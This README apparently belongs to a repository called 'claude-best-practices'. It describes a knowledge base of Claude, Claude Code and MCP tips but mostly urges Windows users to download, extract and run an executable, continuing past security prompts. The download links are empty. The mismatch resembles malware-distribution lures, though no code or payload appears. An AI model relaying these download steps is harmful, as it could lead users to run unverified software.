📘 claude-best-practices - Better Claude Work, Clearer Results
📘 claude-best-practices - Better Claude Work, Clearer Results
🧭 What this is
claude-best-practices is a living knowledge base for Claude, Claude Code, skills, MCP, and agentic workflows. It brings together plain guidance, practical patterns, and working notes from people who use these tools in real work.
Use it to learn how to:
- Write better prompts
- Set up useful Claude Code workflows
- Work with skills and MCP tools
- Build agent flows with fewer mistakes
- Keep your process simple and repeatable
💻 What you need
This app is made for Windows users. It is built for a normal desktop or laptop.
You should have:
- Windows 10 or Windows 11
- At least 4 GB of RAM
- 200 MB of free disk space
- Internet access for the first download
- A mouse and keyboard
For smooth use, a system with 8 GB of RAM or more works better.
📥 Download and install
Visit this page to download:
From there, follow these steps:
- Open the link above in your browser
- Find the latest release
- Download the Windows file for your device
- If the file comes in a .zip package, right-click it and choose Extract All
- Open the extracted folder
- Double-click the app file to run it
If Windows shows a security prompt, choose the option that lets you continue only if you trust the source and the file name matches the release you selected.
🚀 First run
When you start the app for the first time, it may take a moment to load. That is normal.
If the app opens a local page or desktop window, leave it open while you use it. If it asks for access to your browser or local files, allow only what you need for your setup.
🧩 What you can do with it
This knowledge base helps you keep Claude work in one place. It is useful for:
- Comparing prompt styles
- Saving useful workflow notes
- Tracking Claude Code habits
- Reviewing MCP setup ideas
- Recording skill tips for later use
- Sharing best practices with a team
🗂️ Main topics covered
The content in this repository centers on these areas:
- Claude: Core use patterns and better ways to ask for help
- Claude Code: Code work, file use, and task flow
- Skills: Reusable steps and task patterns
- MCP: Tool connections and context handling
- Prompt engineering: Clear prompts that produce better output
- Agentic workflow: Step-based work with fewer repeats
🛠️ How to use it well
Use the knowledge base in small steps:
- Start with one task you want to improve
- Read the related note or guide
- Try the pattern in your own work
- Save what worked
- Return later to refine it
A simple way to use Claude well is to keep each request clear. Say what you want, what you do not want, and what format you need. That helps Claude give a cleaner reply.
🧠 Good use cases
This project fits well if you want to:
- Speed up repeated AI tasks
- Keep prompt notes in one place
- Build a better workflow for Claude Code
- Link tools with MCP
- Use agent steps without losing control
- Teach others how to work with Claude
🔧 Common setup flow
If you are new to this kind of tool, use this path:
- Download the latest release
- Unzip the file if needed
- Open the app or local folder
- Read the starting guide
- Try one example workflow
- Add your own notes as you go
If the release includes multiple files, start with the main Windows app file or the file named in the release notes.
🪟 Windows tips
A few Windows tips can help:
- Keep the download in a folder you can find later
- Use a simple path like Downloads or Desktop
- If the app does not open, check if the file was fully extracted
- If Windows blocks the file, right-click it and check Properties
- Make sure your browser finished the download before opening it
📚 Suggested workflow for beginners
A simple beginner flow looks like this:
- Pick one goal, such as writing a better prompt
- Open the related guide
- Copy the structure, not just the words
- Test it in Claude
- Compare the output
- Keep the version that worked best
This keeps the learning curve low and helps you build a habit that sticks.
🤝 Best ways to keep notes
Use short notes that answer three questions:
- What did I try?
- What worked?
- What should I change next time?
You can keep these notes in the app, in a text file, or in your own notebook. Short notes are easier to reuse.
🔎 Search and review
As the knowledge base grows, it helps to check:
- Prompt patterns you use often
- MCP setups that repeat
- Claude Code steps that save time
- Agent workflows that need fewer edits
Reviewing your notes from time to time helps you avoid repeating the same mistakes.
📁 Project topics
This repository uses these topic areas:
- agentic-workflow
- ai-agents
- anthropic
- best-practices
- claude
- claude-code
- llm
- mcp
- prompt-engineering
- skills
🧰 Troubleshooting
If the app does not start:
- Check that the file finished downloading
- Extract the zip file if there is one
- Run the app file, not the archive
- Restart Windows and try again
- Download the release again if the file looks broken
If the app opens but does not show the right content:
- Refresh the page or reopen the app
- Check your internet connection
- Confirm you opened the latest release
- Look for a README or notes file in the release folder
If you still have trouble, compare the file name with the latest release on the downloads page
📦 Release source
Download from the latest Windows release here:
Use that page to get the newest version and any related files that come with it
📝 What to expect from the content
You will find practical notes that focus on:
- Clear prompts
- Repeatable workflow steps
- Better use of Claude Code
- Tool use through MCP
- Simple methods for agent tasks
- Ways to keep your process consistent
🖥️ File handling tips
If the download comes as a zip file:
- Right-click the zip file
- Choose Extract All
- Pick a folder you can find again
- Open the extracted folder
- Start the main app file inside it
If the download comes as an .exe file:
- Double-click the file to run it
- Follow the on-screen steps
- Allow access only if it matches the release page name
🧭 Daily use pattern
A steady daily flow can look like this:
- Open the app
- Check the note for your task
- Use the pattern in Claude
- Save the result
- Add one small improvement
This keeps the tool useful without making the process hard to manage